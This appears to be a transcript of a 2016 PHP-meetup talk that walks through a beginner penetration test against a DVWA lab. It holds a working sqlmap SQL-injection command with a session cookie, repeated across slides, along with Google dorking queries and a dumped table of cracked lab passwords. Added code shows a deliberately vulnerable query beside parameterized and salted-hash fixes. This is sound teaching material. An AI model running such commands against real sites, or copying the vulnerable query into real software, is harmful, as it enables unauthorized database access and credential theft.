
I want to be a Hacker v3.0

Let's go on a journey through a simple pentest from the start (recon) through the fun stuff (testing and exploiting) to the boring necessity (writing the report).
Presented at Groningen PHP on 4 February 2016

Jakub Gadkowski

February 04, 2016

Transcript

  1. I WANT TO BE A HACKER BUT I ONLY LOOK GOOD IN A WHITE HAT V3.0
  2. GOOGLE
     • Data mining: site:target.com filetype:doc
     • SQL Injection/DB identification: site:target.com "supplied argument is not a valid MySQL"
     • For more check "Exploit Database": https://www.exploit-db.com/google-hacking-database/
  3. EXPLOIT
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit#" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  4. SQLMAP
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  5. TARGET ADDRESS
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  6. THREADS
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  7. RISK
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  8. LEVEL
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  9. TABLES
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  10. KNOWN FACTORS
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  11. COOKIE
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  12. ONE COOKIE IS PLENTY
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
  13. KNOWN PARAMS
     sqlmap -u "http://192.168.33.201/vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL --os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --drop-set-cookie --skip=Submit
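As an added illustration that is not part of the deck: the defect sqlmap is probing through the `id` parameter is a query built by string concatenation. The snippet below reproduces it against a constructed in-memory SQLite stand-in for the DVWA `users` table (column names and hash values taken from the dump slide) and puts the parameterized fix beside it.

```python
import sqlite3

# Constructed stand-in for the DVWA "users" table, using the rows from the dump slide.
ROWS = [
    (1, "admin",   "5f4dcc3b5aa765d61d8327deb882cf99", "admin",   "admin"),
    (2, "gordonb", "e99a18c428cb38d5f260853678922e03", "Brown",   "Gordon"),
    (3, "1337",    "8d3533d75ae2c3966d7e0d4fcc69216b", "Me",      "Hack"),
    (4, "pablo",   "0d107d09f5bbe40cade3de5c71e9e9b7", "Picasso", "Pablo"),
    (5, "smithy",  "5f4dcc3b5aa765d61d8327deb882cf99", "Smith",   "Bob"),
]


def make_db():
    """Build the in-memory table the two lookups run against."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT,"
        " last_name TEXT, first_name TEXT)"
    )
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", ROWS)
    return db


def lookup_vulnerable(db, user_id):
    """The flaw sqlmap finds: the request parameter becomes part of the SQL text,
    so a crafted value changes the query's logic instead of just its data."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return db.execute(sql).fetchall()


def lookup_fixed(db, user_id):
    """Hardened form: the driver binds the value separately from the SQL text,
    so whatever the client sends is compared as data and can only match or not."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"))                 # one row, as intended
    print(len(lookup_vulnerable(db, "1' OR '1'='1")))  # whole table: the finding
    print(lookup_fixed(db, "1' OR '1'='1"))            # [] : the fix
```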
  14. SMELL OF VICTORY
     Database: dvwa
     Table: users
     [5 entries]
     +---------+---------+---------------------------------------------+-----------+------------+
     | user_id | user    | password                                    | last_name | first_name |
     +---------+---------+---------------------------------------------+-----------+------------+
     | 1       | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
     | 2       | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
     | 3       | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
     | 4       | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
     | 5       | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
     +---------+---------+---------------------------------------------+-----------+------------+
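The dump above is a second finding in its own right: the `password` column holds unsalted MD5, which is why sqlmap could print the plaintexts in brackets and why `admin` and `smithy` share a digest. As an added example (not from the deck), the code below flags both symptoms in a dump and shows the storage scheme that removes them: a per-user random salt with PBKDF2-HMAC-SHA256 from Python's standard library.

```python
import hashlib
import hmac
import os
from collections import Counter

# Constructed from the (user, password hash) pairs on the "SMELL OF VICTORY" slide.
DUMP = {
    "admin":   "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337":    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo":   "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy":  "5f4dcc3b5aa765d61d8327deb882cf99",
}


def looks_like_unsalted_md5(digest):
    """32 lowercase hex characters and no salt or algorithm prefix: a fast, unsalted hash."""
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest)


def shared_hashes(dump):
    """Digests that appear under more than one user. With a per-user salt this cannot
    happen; without one, every shared digest also reveals a shared password."""
    counts = Counter(dump.values())
    return {h: sorted(u for u, d in dump.items() if d == h)
            for h, n in counts.items() if n > 1}


def store_password(password, iterations=600_000):
    """Salted, slow hash in a self-describing format: algorithm$iterations$salt$digest."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(stored, password):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print({u: looks_like_unsalted_md5(h) for u, h in DUMP.items()})
    print(shared_hashes(DUMP))  # admin and smithy collide
    rec = store_password("password")
    print(rec, verify_password(rec, "password"))
```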
  15. WRITING A REPORT
     Each finding should contain (at least):
     - Title
     - Severity
     - Detailed description (pictures or it didn't happen)
     - PoC (with examples of links/payload)
  16. LEARNING
     Awesome list of security-related tools with links and descriptions: http://tools.kali.org/tools-listing
     Application Security Learning Resources: https://github.com/paragonie/awesome-appsec/blob/master/README.md
     Great resource about pentesting: http://www.pentest-standard.org/index.php
  17. LEARNING
     Tons of links to security talks on YouTube: https://github.com/PaulSec/awesome-sec-talks
     Google: if you do not know its web address, just google it.